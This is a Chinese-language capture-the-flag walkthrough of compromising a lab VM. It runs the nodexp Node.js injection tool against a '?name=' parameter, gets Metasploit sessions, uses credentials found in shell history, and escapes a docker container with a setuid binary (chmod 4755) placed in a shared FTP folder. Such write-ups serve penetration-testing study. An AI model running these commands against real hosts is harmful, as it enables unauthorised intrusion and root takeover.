确认目标主机IP以及前期的信息收集
做一下暴露面的收集
目标IP:192.168.43.154
看下暴露面:
开放了多个端口而且都是靶机环境,像是docker的感觉
debian系统
apache中间件
没有常见的CMS框架信息
查看下有没有捷径可以走
apache 2.4.25已知的漏洞
openssh 7.4
mysql 5.5.59
令我感兴趣的是8081端口的node_js
可以尝试使用node_js扫描器
克隆到kali本地
git clone https://github.com/esmog/nodexp
配置一下诸如点:
python nodexp.py --url="http://192.168.43.154:8081/?name=[INJECT_HERE]"
随后会输入本机的ip以及监听的端口 并配合msf使用
会在script文件夹下生成.rc文件
使用msfconsole -r .rc文件进行使用 .rc文件时msf的批处理文件
msf执行后在nodexp中输入“1”
将会在msf中获得三个sessions
开始提权
查看下历史记录发现登陆账号
本地登陆获取root权限
获取root权限
但是我却找不到flag的信息,查看到tdl.txt文件
我们登陆到root下面的tdl.txt和4ndr34z用户下面ftp文件夹中是共享的,也就是说root用户依然在docker中,我们使用C编写一段提权代码复制root权限,在4ndr34z用户中执行它实现提权。
vi 1.c
gcc 1.c -o 1
本地使用python -m SimpleHTTPServer开启简单的http服务
使用root用户下载
提前使用apt install wget 安装wget
赋予root执行权限
chmod 4755 1
随后logout退出root用户
进入ftp文件夹中执行1文件
进入root文件夹获取flag